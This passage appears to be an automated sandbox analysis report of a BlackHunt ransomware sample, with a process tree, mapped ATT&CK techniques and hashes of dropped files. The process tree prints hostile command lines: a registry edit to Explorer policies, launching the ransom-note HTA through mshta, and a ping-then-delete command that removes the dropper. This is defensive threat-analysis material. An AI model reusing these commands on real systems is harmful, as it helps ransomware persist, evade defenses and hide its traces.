C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:11644
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:11248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:10960 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:11536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11536 -s 14444⤵
- Program crash
PID:16880
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\a3a2a82d529ec967a06ea2797a7570d00113e0ce52886fc1f79b9c81b0979d01.exe"2⤵PID:11392
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:13672
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious use of WriteProcessMemory
PID:4648
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5640
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:9724
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:14756
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:20160
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe d37601b084e9fa7b33835f7412a1281b ow3TluwcEESMqgPt1hPhNA.0.1.0.0.01⤵PID:1504
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 11536 -ip 115361⤵PID:12120
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD5ce8b467ac1751c3f947ba900312f3d9a
SHA1bd277d370f78c157edba1426b45a31c5e4903381
SHA25643b602bb42bfc46434870b71de93f1c4e4c6cd1940a533108145c115352f902c
SHA5121ab0fc52da3ce3afb08b36333d72f3990f366bc2680b465945d708a134f93ec47b2b8391dca25a9db18d521febf8c85ba020dff3a5d993582c21ff253a33ebac
-
Filesize
1KB
MD5cf4ffa127c16ce930c80f7b01fb36547
SHA1eaec5d65c6374681fc9a9bbfaa85a25c7f63813f
SHA256e5207ec79de7ae87255543e6fef9451cd90f92a747a74dbdeb3661af2690e1ac
SHA51204fd815c3885ee5fc7f1219099c8c980c1d2b628449d7ac725e150643907252a44402aad6734473fbfc555b0d02778cd3634e1bcf7504d7646bf65544bb61b23
-
Filesize
684B
MD5e5bfe1ff6354e2d03fa9672561273404
SHA15d4112e2eb3a4e60ae0ba3e2cead143932636b5e
SHA256c7fac9ab9a164b8e4cf3e0667a8ef50a0599d4bcc9910e6efcce2ec303fd3c5e
SHA51261a98f8bbd63be4598957f2de18fd6473670b075455f723a3e3c8792df246d121090f2c73ed08cc667b1d17ed3a346818bbde5ef0ce1e568785a2ed2d38605ab